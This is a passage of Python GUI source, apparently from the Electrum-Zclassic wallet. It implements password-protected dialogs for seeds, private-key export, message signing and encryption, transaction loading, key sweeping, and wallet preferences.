from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zclassic address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zclassic address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_zclassic.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum-Zclassic was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_zclassic import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a zclassic URI
if str(data).startswith("zclassic:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
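    # Note (descriptive, not part of the original source): a scanned QR payload is
    # either a "zclassic:" payment URI (handled by pay_to_URI above) or a raw
    # transaction encoded in base43, which is decoded with bitcoin.base_decode
    # before being parsed by tx_from_text.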
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum-Zclassic was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_zclassic import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-zclassic-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum-Zclassic was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
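    # Export format note (descriptive): the CSV variant writes an
    # "address,private_key" header followed by one row per address (addresses
    # padded to 34 characters), while the non-CSV variant dumps the same
    # mapping as indented JSON.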
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum_zclassic.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_zclassic.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
            index = list(languages.keys()).index(self.config.get("language", ''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA')])
        # only two entries ('Static', 'ETA') exist in this combo, so the index is 0 or 1
        fee_type_combo.setCurrentIndex(1 if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', False)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', True))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['ZCL', 'mZCL', 'uZCL']
msg = (_('Base unit of your wallet.')
+ '\n1 ZCL = 1000 mZCL. 1 mZCL = 1000 uZCL.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'ZCL':
self.decimal_point = 8
elif unit_result == 'mZCL':
self.decimal_point = 5
elif unit_result == 'uZCL':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
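        # Worked example (illustrative): switching the base unit from ZCL to mZCL
        # changes decimal_point from 8 to 5, so a stored amount of 10^8 base units
        # previously shown as 1.00000000 ZCL is re-rendered as 1000.00000 mZCL; the
        # underlying amounts are preserved via get_amount()/setAmount() above.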
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_zclassic import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_list.refresh_headers()
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum-Zclassic to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
